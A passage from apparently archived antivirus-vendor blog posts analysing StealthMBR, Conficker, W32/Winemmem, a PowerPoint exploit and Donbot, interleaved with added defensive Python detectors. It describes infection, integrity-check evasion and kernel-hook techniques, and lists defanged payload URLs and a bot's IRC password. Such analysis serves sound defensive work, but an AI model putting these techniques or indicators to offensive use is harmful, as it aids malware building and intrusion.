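        raise ValueError("expected exactly one 512-byte sector")
    partitions = []
    for i in range(4):
        status, _, ptype, _, lba, count = struct.unpack_from(ENTRY_FMT, sector, 446 + 16 * i)
        if ptype != 0:
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "start_lba": lba, "sectors": count})
    return {
        "signature_ok": sector[510:512] == BOOT_SIGNATURE,
        "bootstrap_sha256": hashlib.sha256(sector[:446]).hexdigest(),
        "partitions": partitions,
    }


def bootstrap_matches_baseline(sector, baseline_sha256):
    """The check that matters: is the boot code still the one recorded when clean?"""
    return parse_mbr(sector)["bootstrap_sha256"] == baseline_sha256


if __name__ == "__main__":
    clean = build_sample_mbr(b"\xEB\x3C\x90" + b"KNOWN-GOOD-LOADER")
    baseline = parse_mbr(clean)["bootstrap_sha256"]
    tampered = bytearray(clean)
    tampered[0:8] = b"\xE9\x00\x01\x00\x00\x90\x90\x90"   # constructed change to the boot code
    print("clean  :", bootstrap_matches_baseline(clean, baseline))
    print("changed:", bootstrap_matches_baseline(bytes(tampered), baseline))
```

The partition table and the 0x55AA signature stay intact in the tampered copy, which is exactly why a bootkit survives a casual look: the disk still boots, and only the bootstrap bytes differ. The comparison has to run from outside the infected OS, since the hooks described above filter reads of the sector from inside it.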

    The following image shows hijacked kernel object for disk device.

    Hijacked Object

    Once installed, this threat does not require any file or registry entry to sustain itself on the compromised machine. But for installation to occur there is a dropper executable, which has also changed compared to older variants. Detection for the new droppers has been added as StealthMBR.a. The good thing is that we already had proactive detection for some of the dropped files as PWS-JA.gen.a. This should help identify problems and prevent users from getting infected in the first place. We have also developed a solution for detecting and removing this threat once a machine is compromised. It is currently under QA and will be delivered through regular DAT updates very shortly.

    While we are on this subject, we also wanted to plug an upcoming webcast. We will be discussing the workings of StealthMBR rootkit and how we deliver solutions for complex threats like these through regular DAT updates without the need for special stand-alone tools. This webcast will also cover the current rootkit trends & techniques. Come and learn about how to prevent rootkit incidents in your environment and how to tackle such incidents if unfortunately they do occur. See you there!

    Mac Malware In The News

    There has been a bit of chatter today about the first ever Mac-based botnet. This piece of malware actually appeared back in January of this year.

    Quite frankly there is not any functionality in this “bot” (some would simply call it a remote access trojan but let’s not split hairs OK!!) that we have not seen before. The only thing of concern here is that it does affect the Mac platform which certainly is fresh territory.

    As we discussed in our previous blog, it is spread through pirated software at this point (a huge no-no anyway), so hopefully distribution will be light and will not result in large numbers. It definitely does highlight the need for security software regardless of platform!

    Conficker on the prowl after the 1st…

    So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

    Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

    Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

    When it did wake, it used the peer-to-peer (P2P) communication channel to call home, rather than the HTTP rendezvous, to start its latest escapade. In this case, the infected host is contacted initially by another host over an ad-hoc P2P connection, kind of like an alarm clock. Then, after hitting the snooze button for a period of several hours, the communication begins again, starting this time from the infected host.

    Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (aka the update) may go unseen, or at least mostly under the radar, by using fragmented and irregular UDP communication.

    So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address and an encrypted executable file is downloaded. Once executed, it could contain malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the screenshots below:

    We have also seen some hosts serving up a Waledac payload. (Realistically, it may contain anything that the bad guys are serving up on those domains.)

    These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

    Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time, however, it is closer to the original patch, so as to elude detection. (Note: our McAfee Conficker Detection tool is in the process of being redesigned to allow detection of the latest variants.)

    There are also two other notes of interest. The first of which is that we have a new deadline to watch. On May 3rd this latest variant is set to expire.

    Thinking aloud, this point brings some interesting questions to mind, such as: is this just a test from the Conficker crew, who are serving up Waledac incidentally? Or is this done for other self-serving reasons (i.e. attention diversion)? Maybe it’s just a deadline for a rented botnet? Interesting questions that I am sure the security community at large is wondering about.

    Second, when an infected host resolves an HTTP rendezvous domain name, it compares the resolved IP with the list of IPs it has already queried; if the new IP is in the list, it moves on to the next domain in its list.

    Of course, we will update if anything else comes along…

    W32/Winemmem – Know Your Enemy

    Do you remember what the first goal of file infector distribution is? It is demand. Without demand, infected files may never be downloaded by end users. What is the second goal? To stay undetected by most AV products. A week ago we found a new file infector that fits the bill.

    Nowadays, instead of relying on mass mailing, malware authors are specifically attacking individual companies that produce popular software. We’ve been contacted by several software development companies with a similar issue: suspected malware on their machines. Somebody noticed that the hashes calculated for setup installers and packages distributed to millions of customers were different from what they should have been.

    Brief reference – “Setup package installer application creates executable installation wizard of windows program without changing software functionality and data file integrity. Advanced setup creator tool generates program setup self extracting file by adding company name, version, setup name, desktop icon, copyright text, start menu icon, installation folder path and license agreement. Setup generator program includes multiple application files into single executable .exe setup with full install and uninstall feature.”

    Packages (executable files) were self-protected using strong integrity checks; some were digitally signed. This is common for professional setup-builder tools producing self-extracting executables: the integrity of the installer is checked before uncompressing and extracting the data, in order to protect the product and make sure it has not been damaged or modified. Checksums and similar protection features are implemented in every popular self-extracting archiver (WinRAR, WinZip), installer (NSIS, Astrum, InstallShield), and software protection system (ASProtect, Themida or Armadillo). If anything happens to the installer, e.g. a single byte is modified, the end user will be notified with an error message. But in this particular case none of the users reported any problems while running the packages/installers, and no warnings were raised by any AV products either.

    We received about 5 different samples. All executables were created with either commercial or open source setup builders, were packed, and contained an overlay (extra data at the end of the file), where installers typically keep compressed and/or encrypted data. Upon execution, the samples did not perform any visible or unexpected activity, and the extracted files were clean (the majority of the executables were digitally signed and had a valid signature). Since the files inside the installers are not modified, the only way malware can be distributed is by modifying the installers themselves, so the Avert Labs Research Team was notified to take a closer look at the suspicious files.

    Within about 30 minutes, a new generic signature, “W32/Winemmem”, was added to the database to detect the new file infector and clean the virus body, removing the virus from the file so that the file can be used safely.

    Let’s go ahead and follow the virus logic to understand what it does and see how it was possible to infect installers and bypass self-integrity checking. W32/Winemmem infects packages, installers, and self-extracting archives (files with extra data, the so-called “overlay”). It rewrites the code section of the original application (1) and relocates a random-size block of code from the beginning of the code section and the OEP (2) to the end of the file (3 and 4 below, respectively), increasing the size of the extra data. This virus does not create new sections and does not modify the PE header. In order to gain control when an infected file is run, the virus rewrites the original code located at the entry point:
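To make the layout above concrete, here is an added Python example (not the author's tooling) that fingerprints a PE file the way an installer-integrity check could: it hashes each section's raw bytes and measures the overlay that follows the last section, then reports what changed against a baseline. The minimal PE it builds is constructed for the demonstration; the assumption is that a known-clean copy of the installer was fingerprinted earlier.

```python
import hashlib
import struct

SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER (40 bytes)


def build_sample_pe(text, data, overlay):
    """Constructed minimal PE32 with .text and .data (0x200 raw bytes each) plus an overlay."""
    sections = [(b".text", 0x1000, text), (b".data", 0x2000, data)]
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    optional = struct.pack("<H", 0x10B).ljust(0xE0, b"\x00")            # PE32 magic, rest zero
    headers = dos + b"PE\x00\x00" + coff + optional
    raw, ptr = b"", 0x200
    for name, va, body in sections:
        body = body.ljust(0x200, b"\x00")[:0x200]
        headers += struct.pack(SECTION_HDR, name, len(body), va, len(body), ptr, 0, 0, 0, 0, 0x60000020)
        raw += body
        ptr += len(body)
    return headers.ljust(0x200, b"\x00") + raw + overlay


def pe_fingerprint(image):
    """Hash every section's raw bytes and measure the overlay after the last section."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", image, 0x3C)[0]
    if image[pe:pe + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, pe + 6)[0]
    opt_size = struct.unpack_from("<H", image, pe + 20)[0]
    table = pe + 24 + opt_size
    sections, end_of_sections = {}, 0
    for i in range(num_sections):
        name, _, _, raw_size, raw_ptr = struct.unpack_from(SECTION_HDR, image, table + 40 * i)[:5]
        sections[name.rstrip(b"\x00").decode("ascii")] = hashlib.sha256(image[raw_ptr:raw_ptr + raw_size]).hexdigest()
        end_of_sections = max(end_of_sections, raw_ptr + raw_size)
    return {"sections": sections, "overlay_offset": end_of_sections,
            "overlay_size": max(0, len(image) - end_of_sections)}


def diff_against_baseline(image, baseline):
    """List what changed relative to a fingerprint taken from the known-clean installer."""
    current = pe_fingerprint(image)
    changes = [f"section {n} modified" for n, h in baseline["sections"].items()
               if current["sections"].get(n) != h]
    if current["overlay_size"] != baseline["overlay_size"]:
        changes.append(f"overlay size changed from {baseline['overlay_size']} to {current['overlay_size']} bytes")
    return changes


if __name__ == "__main__":
    clean = build_sample_pe(b"\x55\x8B\xEC" + b"\x90" * 16, b"CONFIG=1", b"PAYLOAD" * 20)
    base = pe_fingerprint(clean)
    infected = bytearray(clean)
    infected[0x200:0x205] = b"\xE9\x00\x10\x00\x00"   # constructed: entry-point code rewritten
    infected += b"\x00" * 60                          # constructed: overlay grew by the stolen block
    print(diff_against_baseline(bytes(infected), base))
```

The two differences this reports, a changed code section and a larger overlay with an unchanged header, are exactly the footprint described above. The check only helps if it is run on the file at rest from a clean system, because the virus restores the on-disk file while it runs, which is the subject of the next paragraphs.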

    Once an infected executable is run, the virus hooks the CreateFileA() API. W32/Winemmem gains control and searches for Windows PE executables in the Program Files folder. It then parses the Import Table and searches for system dynamic link libraries (DLLs) associated with the executables (EXEs). Next, the virus copies the found DLL to the same folder that contains the found EXE file and infects the copied DLL by modifying code at the entry point and appending the virus body to the end of the last section, so that malicious code is executed every time any of the infected EXE files is run. Upon execution of any “infected” file in the Program Files folder, the virus hooks the WS2_32.dll Send() API and performs its malicious activity the first time an infected application calls it. It may infect files on removable drives by searching the entire drive for suitable executables, or download and execute files from remote hosts.

    So, since the original setup installer is modified and the code section and file sizes are changed, why doesn’t the application’s self-integrity check fire; why aren’t users warned? Once an infected file is executed, the virus restores the original application on disk by writing the data from the beginning of the code section and the OEP back to the file. To prevent the classic interceding-update scenario, Windows locks a running file and it is not possible to write to it. To bypass that, the virus drops a kernel-mode rootkit (MD5: CE769EAE2F1A7A4ED622C15E715D851E) and hooks a kernel-mode API located in ntoskrnl.exe (the function name is withheld for security reasons). According to our research, this routine is called by the file system before deleting or opening any file for write access. All the rootkit needs to do is hook the API and check its input parameters. That’s exactly what it does: it patches the first 8 bytes to return 1 in all cases, by rewriting the beginning of the API with two instructions:

    8 bytes, and you can delete any file on disk, no matter whether it is a running executable, a loaded dynamic link library, or any other file locked by some process. While testing it, I managed to delete the entire Windows folder without any errors or questions from the secure operating system.

    But what is the purpose of hooking the ExitProcess() and ExitWindowsEx() APIs? Since the original file on disk no longer contains the virus body (remember, the virus is in memory and the file on disk was restored in order to bypass integrity checks), W32/Winemmem needs to infect the file again once the user tries to close the installer (ExitProcess) or reboot the system (ExitWindowsEx).

    OK, what about the second goal I mentioned in the beginning: is it invisible to AV products? Even though it is not polymorphic, the majority of AV vendors, except for a few (not listed here) that catch the dropped rootkit, do not currently detect the virus (as of 07/04, as seen in these VirusTotal results):

    By the way, this variant of W32/Winemmem keeps all the information necessary to restore the original file at a constant offset, unencrypted. If you are writing a cleaner for this one, check the table located at OEP + 0x159. It contains the VAs and sizes of the stolen bytes.

    Drive-by-Download Du Jour

    LuckySploit is an exploit framework that’s been in the news recently. As drive-by-downloads go, it lurks behind iframes and foists malware upon unsuspecting users.

    One LuckySploit attack we analyzed downloaded the FakeAlert-BY Trojan. So if you visited a Web site today then saw this…

     FakeAlert-BY

    … then you are, unfortunately, infected with FakeAlert-BY, and possibly thanks to LuckySploit.

    We detect the LuckySploit downloader as JS/Downloader-BNL in the 5580 DATs, to be released on April 10. We’ve had detection for FakeAlert-BY since the 5545 DATs, released on March 6.

    Please update your AV signatures and stay secure!

    Artemis in Action

    “Artemis” is McAfee’s new cloud-computing technology, capable of detecting new malware threats in real time. In the last 48 hours our Artemis technology detected some malware that was targeted at certain regions of the world.

    In North America, one particular sample was queried by Artemis more than 80 times from more than 60 unique (ISP, not end-point) IP addresses. This is highlighted in the first figure below by the dispersed nature of the red dots. Artemis had already detected this malware and offers extra protection over the regular DAT files. After further analysis we added detection for this sample to the regular DATs as a “Generic.dx” Trojan for Thursday’s DAT release.

    This particular sample was seen only in North America. The red dot in the Pacific Ocean covers the islands of Hawaii, while the dot in Europe is from a well-known multi-AV scanner service vendor based in Spain. Presumably the sample was submitted there by someone in America! ;)

    Sorry to pick on North America again, but another sample has popped up on our radar. As you can see, we didn’t have automatic protection for this one, but the various systems analyzing the threat details soon marked it as bad. These systems report that this sample has been seen only through our consumer (VirusScan Online) and SMB (ToPS) products. This sample has now been classified as a Spy-Agent.bw Trojan and will also be included in Thursday’s regular DATs.

    Example 1: (figure)

    Example 2: (figure)

    New Conficker Variant

    McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

    Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

    We have also updated our stand-alone cleaning tool, Stinger, to detect and clean this variant.

    More information on this variant of the Conficker worm is available here. McAfee’s coverage and protection for the MS08-067 vulnerability is available here.

    For measures to protect yourself and your organization against Conficker, please visit:

    We will continue to monitor this threat in our labs, and will update our blog with any new findings.

    Happy Easter: Egg-Hunting With New PowerPoint Zero-Day Exploit

    As a follow-up to my colleagues’ blog post about the newest Office exploits, here is an analysis of one of the Microsoft PowerPoint zero-day exploits that once again are used in targeted attacks to infect victims with a trojan horse. The malicious presentation files abuse a new, as yet unpatched hole in Microsoft PowerPoint and cause it to execute code infiltrated by the attackers. This blog post shows how the shellcode works and what it does right after an innocent victim opens the malicious file – if the attacker gets their way, of course!

    For size reasons, the code is split up into several parts that are scattered throughout the malicious PowerPoint file. Part one of the shellcode consists of an “egghunter”, which is used to locate the remaining part of the shellcode in memory. To do that, it first sets up an exception handler that prevents crashes when accessing bad memory locations, then goes on a hunt for the shellcode’s prepended egg (0xD1CF11E0). Once that egg (which is a marker for the beginning of the shellcode’s second part) is found in memory, code execution is transferred to the code following it.

    Part two of the shellcode begins with a loop that looks for a writable memory block of at least 1KB in size (starting at address 0x30000000). Another loop then XOR-decodes another part of the shellcode into that memory location and branches to it. Once decoded, a filename (“fssm32.exe”) can be seen in the disassembly. In order to either download or drop a second-stage executable, shellcode needs access to operating system API functions. The ones it needs are imported by parsing OS-internal structures, such as the Process Environment Block, to locate kernel32.dll, then parsing the library’s PE header to locate the desired function pointers.

    As shellcode mostly needs to fit into a size-limited block of memory, this piece of exploit not only has its code split into several parts for it to work reliably, it also uses 32-bit hashes of the API functions to import, rather than a list of function names, which would consume more space. The shellcode’s ROR-13 hashing algorithm iterates over every exported API function name and compares the result against its given list at run time. Applying the same technique when statically analyzing the shellcode, the list of imported functions becomes readable. Looking at the now readable list, it does not contain any function which would indicate that the shellcode downloads a file; rather, it drops one embedded in the PowerPoint file and executes it.

    Using a hex-search for typical indicators of an executable file, such as an “MZ” or “PE” header doesn’t yield any feasible results – which is not astonishing at all. Of course, the attackers responsible for having built the exploit intended to prevent their cover being blown by something as obvious as an executable that is embedded into a PowerPoint presentation file! By looking more closely at the shellcode, there is another suspicious XOR-decoding loop.

    The loop decrypts a given memory block using an 8-bit XOR key. By incorporating the same decryption loop into a Python script and applying it to the PowerPoint file (see screenshot below), both an MZ and a PE header surface in the hex editor. It’s the embedded executable that was assumed to hide between the PowerPoint “slides” – the malware can finally be extracted.
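The two static-analysis steps described above, resolving ROR-13 API hashes back to names and finding the XOR-encoded executable, as an added Python example that is not the author's script. It assumes the classic rotate-right-13-then-add loop over the function-name bytes with no terminator (the loop in a real sample should be matched against its disassembly, since some variants include the null byte or mix in the module name), and the carrier bytes and fake PE header it searches are constructed here.

```python
import struct

# --- ROR-13 API hashing -----------------------------------------------------
def ror13_hash(name):
    """Hash used by the shellcode's import resolver: rotate right 13, add next byte."""
    h = 0
    for c in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + c) & 0xFFFFFFFF
    return h


def resolve_hashes(wanted, export_names):
    """Map hashes recovered from the shellcode back to names from a DLL's export list."""
    table = {ror13_hash(n): n for n in export_names}
    return [table.get(h, f"unknown_{h:08x}") for h in wanted]


# --- 8-bit XOR brute force for an embedded executable ------------------------
def xor_decode(data, key):
    return bytes(b ^ key for b in data)


def find_xor_encoded_pe(blob):
    """Try all 256 keys; accept a hit only if both 'MZ' and the PE signature line up."""
    for key in range(256):
        needle = xor_decode(b"MZ", key)
        pos = blob.find(needle)
        while pos != -1:
            if pos + 0x40 <= len(blob):
                e_lfanew = struct.unpack("<I", xor_decode(blob[pos + 0x3C:pos + 0x40], key))[0]
                sig = pos + e_lfanew
                if sig + 4 <= len(blob) and xor_decode(blob[sig:sig + 4], key) == b"PE\x00\x00":
                    return key, pos
            pos = blob.find(needle, pos + 1)
    return None


# Constructed carrier: filler bytes, then a tiny fake PE header XORed with 0x7A, then padding.
FAKE_EXE = (b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00"
            + struct.pack("<HH", 0x14C, 2) + b"\x00" * 40)
SAMPLE_KEY = 0x7A
SAMPLE_BLOB = bytes(range(0x80, 0xB0)) * 4 + xor_decode(FAKE_EXE, SAMPLE_KEY) + b"\xCC" * 32

if __name__ == "__main__":
    print(resolve_hashes([0xEC0E4E8E], ["LoadLibraryA", "GetProcAddress", "WinExec"]))
    print(find_xor_encoded_pe(SAMPLE_BLOB))   # (122, 192)
```

Requiring the PE signature at `e_lfanew` to decode under the same key is what keeps the brute force quiet: a two-byte "MZ" match alone fires on random data for one key in roughly 65,000 positions, the combined check practically never does. The export names fed to `resolve_hashes` would normally be read from the kernel32.dll export table with a PE parser.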

    McAfee VirusScan products detect this threat as Exploit-PPT.k trojan; McAfee Anti-Malware Gateway Edition (formerly Secure Computing) detects the new exploits as Heuristic.Exploit.OLE2.CodeExec.PGPG.

    Donbot – Joining The Club of Million Dollar Botnets

    Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild. Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

    When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe. It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits in Windows XP Service Pack 2 and newer. We detect this rootkit as Generic Rootkit.g trojan. It then establishes an outbound connection to a remote IRC server using the following credentials:

    • PASS h4xg4ng
    • NICK [00-USA-XP-9215671]
    • USER SP2-ojd, followed by the name of the infected computer.
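The registration lines above are a good place to hook a detection. As an added example (not from the original post), this Python scores the first commands of an IRC session for bot traits: the known server password, a NICK that encodes country and OS rather than a name, and a USER field built from the service-pack level. The session lines are constructed; the regular expressions generalise the one nick format quoted above and are an assumption about the family's naming scheme.

```python
import re

# Constructed client-to-server IRC lines, modelled on the login sequence quoted above.
BOT_SESSION = [
    "PASS h4xg4ng",
    "NICK [00-USA-XP-9215671]",
    "USER SP2-ojd WKS-042 * :WKS-042",
    "JOIN #upd",
]
HUMAN_SESSION = [
    "NICK alice",
    "USER alice 0 * :Alice Example",
    "JOIN #python",
]

# Server password quoted on the page; treat it as one indicator, not the only signal.
KNOWN_BOT_PASSWORDS = {"h4xg4ng"}
# Nick layout: [<2 digits>-<country>-<OS>-<digits>], i.e. a victim fingerprint rather than a name.
BOT_NICK_RE = re.compile(r"^\[\d{2}-[A-Z]{2,3}-[A-Z0-9]{1,6}-\d{4,}\]$")
# USER field starting with the service-pack level instead of a username.
BOT_USER_RE = re.compile(r"^SP\d-[a-z]{3}\b")


def analyse_irc_registration(lines):
    """Return the suspicious traits found in the registration phase of an IRC session."""
    findings = []
    for line in lines:
        command, _, rest = line.partition(" ")
        if command == "PASS" and rest in KNOWN_BOT_PASSWORDS:
            findings.append("known bot server password")
        elif command == "NICK" and BOT_NICK_RE.match(rest):
            findings.append(f"fingerprint-style nick {rest}")
        elif command == "USER" and BOT_USER_RE.match(rest):
            findings.append(f"service-pack-style USER field {rest.split()[0]}")
        elif command == "JOIN":
            break   # registration is over; channel traffic needs other rules
    return findings


def is_probable_bot(lines, min_findings=2):
    """Two independent traits are required so a single odd nickname does not alert on its own."""
    return len(analyse_irc_registration(lines)) >= min_findings


if __name__ == "__main__":
    print(analyse_irc_registration(BOT_SESSION))
    print(is_probable_bot(HUMAN_SESSION))
```

The structural traits (nick and USER layout) outlive a password change by the operator, while the password match gives a high-confidence hit on this specific family; scoring them together is what makes the rule both durable and precise.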

    This worm does indeed exploit the MS08-067 vulnerability, and uses a download-and-execute shellcode which behaves identically to Conficker’s exploit, with only some differences in implementation. It is encoded using a simple 1-byte XOR key and looks like any other standard PEB shellcode, which loads API libraries (i.e. urlmon.dll) and calls URLDownloadToFile() to download malware from already infected systems onto new targets. Unlike Conficker, which injects a downloaded DLL into running Windows processes, this worm downloads and installs a 66.scr executable file instead.

    ShellCode

    As mentioned, the Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself. The Metasploit framework has become a popular platform for security tool development and automation. As we can see, the latest version of Metasploit is not only used by whitehats for vulnerability assessments and penetration testing, but also for malware development. The W32/IRCbot.gen.a worm is no exception: it has remote language detection taken from Metasploit’s “smb_fingerprint()” routine implemented in the “smb.rb” module, as well as DCERPC service connection-testing code located in the “client.rb” module. By using these routines, the new worm can conveniently determine which operating system and service pack it is targeting, to achieve a better infection success rate. The order in which W32/IRCbot.gen.a sends the attack packets is identical to Metasploit’s MS08-067 module (ms08_067_netapi.rb):

    WireShark

    Both Conficker and W32/IRCbot.gen.a use open source tools to their advantage in the same way, to make their work much easier.

    We went on to investigate the additional sites the worm connects to and the payload it tries to download. Packet sniffer logs show that it accesses at least two other remote servers:

    • hxxp://98.1[infected].42:443/n
    • hxxp://74.2[infected].90:88/jueo.exe

    While the first server was not showing any activity at the time of research, the second server is still active and hosts additional malware that is installed on infected machines:

    VirusTotal

    Well, hello Donbot! Upon investigation, the downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C), detected generically as Generic.dx, appears to be a component of an active botnet called Donbot (also known as Bachsoy). Components of Donbot typically create a proxy on infected machines and may be used to relay spam and HTTP traffic. Except for a few, most AV vendors seem to have detection for this malware.

    Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks like the Donbot authors have decided to expand the potential of their botnet. While other botnets, namely Cutwail and Rustock, continue to dominate the distribution of spam, Donbot is making an eager attempt to get a bigger share of the spam revenue pie as one of the top 5 most active botnets worldwide. Clearly, worm authors are focusing on growing their botnets, as they might not get another chance like the MS08-067 exploit for a long time.

    This also serves as yet another reminder that there could well be many computers on the Internet that still do not have the latest security updates installed, more than 5 months after the release of the MS08-067 patch.

    Google Searching for Madoff’s Yacht Leads to Fake Anti-Virus and Malware

    Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributors have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht, a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out malware distributors have homed in on the yacht phrase and the top Google results are malicious URLs. We first noticed this on the evening of April 1 when we first read the story and were curious, and our first take was “Wow, they are fast”. We watched the evolution of the number of Google results that presented malware over the course of April 2. The last we checked, even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

    Google Search Results

    The search results don’t look so threatening, but if you click on the first few URLs, you’ll find differently. Each of these URLs is a rogue anti-virus URL that will distribute malware. Here are a couple of examples…

    Quite a bad site indeed!

    Misleading Searches Lead to Porn and Malware!!!

    These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity, will be taken to the malware delivery upon clicking where prompted, and frequently the malware has already been delivered even if you don’t click.

    This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

    Rogue AV Sure Does Look Real!!!

    So what about that 1969 Rybovich? What about further curiosity-based Googling? Next time you find yourself conducting such a search, do so with caution. Consider whether the search result URLs all look similar. In this case, that is the first red flag. When you click through to a link, does the content look like what you expected, or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed to red flag number three, the fake malware scan. Already you’re taking a dangerous path that is not going to show you anything about Madoff’s yacht.

    Next Up: Office Exploits Reloaded

    We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

    McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detect this threat as Exploit-PPT.k trojan using the 5573 DATs, to be released on the same day.

    As with most other document exploits, these PowerPoint files install malicious trojans in the background but display an innocent PowerPoint presentation to the victim as a deceptive measure. The following list shows a variety of malware files installed in these attacks:

    • fssm32.exe: 428,032 bytes (Muster.c trojan)
    • IEUpd.exe: 45,056 bytes (Muster.c trojan)
    • setup.exe: 131,072 bytes (Muster.c trojan)
    • PeerCM.exe: 80,666 bytes (Generic BackDoor.u trojan)
    • ws2_42.dll: 106,740 bytes (Generic BackDoor.u trojan)

    Some of these specially crafted exploits arrived as PowerPoint Show files with the “.pps” extension. Such files typically open in full-screen mode and hide the applications running on the desktop, such as system monitoring tools, that could give the victim any clue to the dodgy installation of trojans.

    Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

    Conficker.C Over The Wire

    A lot has already been written about Conficker. There have been excellent analysis reports published by SRI, The Honeynet Project and others. Vinay Mahadik and I would like to present some findings on the network aspects of Conficker.C’s behavior.

    We set up a small testbed that had a machine infected with Conficker.C in a controlled environment, and another Linux box that was customized for packet mangling. This enabled us to intercept or mangle the packets exchanged between the infected machine and the outside world. We monitored the activity of the infected host over several days. We classify the test into two phases: the pre-April 1st phase and the April 1st phase.

    During the pre-April 1st phase we observed the following.

    Conficker.C obtains the current date from popular websites. It sends a DNS query to the name server to resolve the website’s IP address, then issues an HTTP GET request to that address and reads the date from the response. The figure below illustrates an attempt against craigslist.org:

    Conficker.C also sends UDP and TCP probes to locate its peers. We observed fairly aggressive, simultaneous UDP and TCP scans. The volume of UDP scanning was particularly high, roughly 2 to 3 UDP queries per second, and it seemed to taper off as we got closer to April 1st. Because most of the randomly generated IP addresses were not live or did not have the targeted ports open, the infected host received a large number of ICMP messages in return: port unreachable, host unreachable and time-to-live exceeded.
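    The scanning behavior described above lends itself to a simple fan-out heuristic on flow data: a host that sends UDP to many distinct addresses in a short window and gets ICMP unreachable or time-exceeded errors back for most of those probes is discovering peers at random, not talking to a fixed set of servers. The Python below is an added example, not McAfee’s signature logic (which keys on the packet patterns found in the reverse engineering of the peer conversations, and which this code does not reproduce). The traffic is constructed to mirror the test-bed observations: about 3 UDP probes per second to random-looking addresses, most answered by ICMP errors, alongside a benign host doing a burst of DNS lookups.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Packet:
    """One observed packet. The sample traffic below is constructed, not a real capture."""
    t: float             # seconds since start of capture
    src: str
    dst: str
    proto: str           # "udp", "tcp" or "icmp"
    dport: int = 0       # destination port for udp/tcp
    icmp_type: int = -1  # 3 = destination unreachable, 11 = time exceeded


def udp_fanout_alerts(packets, window=10.0, min_targets=15, min_error_ratio=0.5):
    """Flag hosts that, within one time window, send UDP to many distinct
    addresses and receive ICMP errors back for most of those probes.

    Random peer discovery looks like this: most targets are dead or not
    listening, so port/host-unreachable and TTL-exceeded replies pile up.
    A host talking UDP to a few fixed servers (DNS, NTP) never trips it.
    """
    probes = defaultdict(lambda: defaultdict(list))  # host -> window -> [dst, ...]
    errors = defaultdict(lambda: defaultdict(int))   # host -> window -> ICMP errors received
    for p in packets:
        bucket = int(p.t // window)
        if p.proto == "udp":
            probes[p.src][bucket].append(p.dst)
        elif p.proto == "icmp" and p.icmp_type in (3, 11):
            errors[p.dst][bucket] += 1  # the error is addressed back to the prober

    alerts = []
    for host, buckets in probes.items():
        for bucket, dsts in sorted(buckets.items()):
            distinct = len(set(dsts))
            errs = errors[host][bucket]
            ratio = errs / len(dsts)
            if distinct >= min_targets and ratio >= min_error_ratio:
                alerts.append({
                    "host": host,
                    "window_start": bucket * window,
                    "probes": len(dsts),
                    "distinct_targets": distinct,
                    "icmp_errors": errs,
                    "error_ratio": round(ratio, 2),
                })
    return alerts


def make_sample_traffic():
    """Constructed traffic: one host probing random-looking addresses at about
    3 UDP packets/s, one host doing a burst of DNS lookups to the local resolver."""
    pkts = []
    for i in range(30):
        t = i / 3.0
        dst = f"198.51.100.{i + 1}"  # documentation range, stands in for random IPs
        pkts.append(Packet(t, "10.0.0.5", dst, "udp", dport=30000 + i * 7))
        if i < 20:    # target is up but nothing listens: ICMP port unreachable
            pkts.append(Packet(t + 0.05, dst, "10.0.0.5", "icmp", icmp_type=3))
        elif i < 22:  # route dies on the way: TTL exceeded from a router
            pkts.append(Packet(t + 0.05, "192.0.2.1", "10.0.0.5", "icmp", icmp_type=11))
    for i in range(30):
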